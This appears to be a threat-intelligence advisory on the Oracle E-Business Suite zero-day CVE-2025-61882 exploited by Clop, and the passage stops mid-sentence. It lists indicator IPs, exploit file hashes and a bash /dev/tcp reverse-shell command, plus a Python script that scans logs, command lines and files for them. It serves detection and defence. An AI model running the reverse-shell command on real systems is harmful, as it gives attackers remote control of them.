Oracle has released an advisory about a critical E-Business Suite zero-day vulnerability CVE-2025-61882 that allows attackers to perform unauthenticated remote code execution, with the flaw actively exploited in Clop data theft attacks.
CVE-2025-61882 is a critical zero-day vulnerability in Oracle E-Business Suite that allows unauthenticated remote code execution and has been actively exploited by the Clop ransomware group. It has a high CVSS score of 9.8, indicating an urgent security risk because it can be exploited over the network without any authentication.
CVSSv3 score: 9.8 (Critical)
Score as per Recorded Future: 99
Affected Product: Oracle E-Business Suite (EBS)
Component: Concurrent Processing – BI Publisher Integration
Attack Vector: Remote, unauthenticated (no username/password required)
First Reported: Oct 5, 2025
Affected Products and Versions: Oracle E-Business Suite, versions 12.2.3-12.2.14
| Indicator | Type | Description |
| --- | --- | --- |
| 200[.]107[.]207.26 | IP | Potential GET and POST activity |
| 185[.]181[.]60.11 | IP | Potential GET and POST activity |
| sh -c /bin/bash -i >& /dev/tcp// 0>&1 | Command | Establish an outbound TCP connection over a specific port |
| 76b6d36e04e367a2334c445b51e1ecce97e4c614e88dfb4f72b104ca0f31235d | SHA256 | oracle_ebs_nday_exploit_poc_scattered_lapsus_retard_cl0p_hunters.zip |
| aa0d3859d6633b62bccfb69017d33a8979a3be1f3f0a5a4bf6960d6c73d41121 | SHA256 | oracle_ebs_nday_exploit_poc_scattered_lapsus_retard-cl0p_hunters/exp.py |
| 6fd538e4a8e3493dda6f9fcdc96e814bdd14f3e2ef8aa46f0143bff34b882c1b | SHA256 | oracle_ebs_nday_exploit_poc_scattered_lapsus_retard-cl0p_hunters/server.py |
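One way to sweep for the indicators in the table above, as an added example that is not part of Oracle's advisory or the original page. The combined access-log format, the function names and the sample lines are assumptions constructed for illustration.

```python
import hashlib
import re

# Indicators copied from the table above (IPs defanged as published).
IOC_IPS = {ip.replace("[.]", ".") for ip in
           ("200[.]107[.]207.26", "185[.]181[.]60.11")}
IOC_SHA256 = {
    "76b6d36e04e367a2334c445b51e1ecce97e4c614e88dfb4f72b104ca0f31235d",
    "aa0d3859d6633b62bccfb69017d33a8979a3be1f3f0a5a4bf6960d6c73d41121",
    "6fd538e4a8e3493dda6f9fcdc96e814bdd14f3e2ef8aa46f0143bff34b882c1b",
}
# The table elides host and port, so match the shape of the bash
# /dev/tcp redirection rather than a fixed destination.
REVSHELL_RE = re.compile(r"bash\s+-i\s+>&\s*/dev/tcp/\S*\s+0>&1")
# Assumption: web logs are in Apache/NGINX combined format.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]*\] "(GET|POST) (\S+)')

def scan_access_log(lines):
    """Return (ip, method, path) for GET/POST requests from an IoC IP."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if m and m.group(1) in IOC_IPS:
            hits.append(m.groups())
    return hits

def scan_cmdlines(cmdlines):
    """Return process command lines that contain the reverse-shell shape."""
    return [c for c in cmdlines if REVSHELL_RE.search(c)]

def file_matches_ioc(path):
    """Hash a file in chunks and compare against the listed SHA256 values."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(1 << 20), b""):
            h.update(chunk)
    return h.hexdigest() in IOC_SHA256

# Constructed sample data (not real telemetry); paths are placeholders.
SAMPLE_LOG = [
    '200.107.207.26 - - [05/Oct/2025:10:00:00 +0000] "POST /placeholder/a HTTP/1.1" 200 512',
    '192.0.2.10 - - [05/Oct/2025:10:00:01 +0000] "GET /placeholder/b HTTP/1.1" 200 128',
    '185.181.60.11 - - [05/Oct/2025:10:00:02 +0000] "GET /placeholder/c HTTP/1.1" 404 0',
]
SAMPLE_CMDS = ["sh -c /bin/bash -i >& /dev/tcp/HOST/PORT 0>&1", "bash -lc 'ls -l /tmp'"]

if __name__ == "__main__":
    print(scan_access_log(SAMPLE_LOG))
    print(scan_cmdlines(SAMPLE_CMDS))
```

A hit from any of the three checks is a lead for triage, not proof of compromise; the IP matches in particular only show that a listed address made a GET or POST request.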
The exploitation of CVE-2025-61882 can result in